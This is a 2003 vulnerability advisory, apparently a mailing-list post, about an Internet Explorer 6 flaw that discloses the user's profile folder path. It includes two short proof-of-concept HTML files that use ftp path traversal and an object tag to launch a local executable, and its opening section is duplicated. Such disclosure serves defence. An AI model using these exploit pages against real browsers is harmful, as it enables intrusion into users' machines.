Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html]
Date:
~~~~~~~~~~~~~~~~~
5 June 2003
Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy (at) bp.iij4u.or (dot) jp [email concealed]]
Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP3 Internet Explorer 6.0 SP1
Overview:
~~~~~~~~~~~~~~~~~
A remote attacker is able to gain access to the path of the %USERPROFILE% folder
without guessing a target user name by this vulnerability.
ex.) %USERPROFILE% = "C:\Documents and Settings\victim"
Details:
~~~~~~~~~~~~~~~~~
This vulnerability is in the address of a "Cannot find server" page.
The address of a "Cannot find server" page is
"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and
Settings\%USERNAME%\Desktop\ftp:\\%@\".
Exploit code:
~~~~~~~~~~~~~~~~~
**************************************************
This exploit reads %TEMP%\exploit.html.
You need to create it.
And click on the "Exploit" link on the ftpexp.html.
**************************************************
Hash: SHA1
Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html]
Date:
~~~~~~~~~~~~~~~~~
5 June 2003
Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy (at) bp.iij4u.or (dot) jp [email concealed]]
Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP3 Internet Explorer 6.0 SP1
Overview:
~~~~~~~~~~~~~~~~~
A remote attacker is able to gain access to the path of the %USERPROFILE% folder
without guessing a target user name by this vulnerability.
ex.) %USERPROFILE% = "C:\Documents and Settings\victim"
Details:
~~~~~~~~~~~~~~~~~
This vulnerability is in the address of a "Cannot find server" page.
The address of a "Cannot find server" page is
"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and
Settings\%USERNAME%\Desktop\ftp:\\%@\".
Exploit code:
~~~~~~~~~~~~~~~~~
**************************************************
This exploit reads %TEMP%\exploit.html.
You need to create it.
And click on the "Exploit" link on the ftpexp.html.
**************************************************
[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>
[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>
Workaround:
~~~~~~~~~~~~~~~~~
None.
Vendor Status:
~~~~~~~~~~~~~~~~~
Microsoft was notified on 7 November 2002.
A patch will be released to fix this bug in the future.
- ------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: ptrs-ejy (at) bp.iij4u.or (dot) jp [email concealed]
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- ------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida
iQA/AwUBPt8y+vfWv13kjJq0EQJ+tgCeKwVv/+MtKD2zGtp29pjwlDR119MAoJOk
ABdf8AVY3NtdcBgzsS7VHm+J
=52pX
-----END PGP SIGNATURE-----
[ reply ]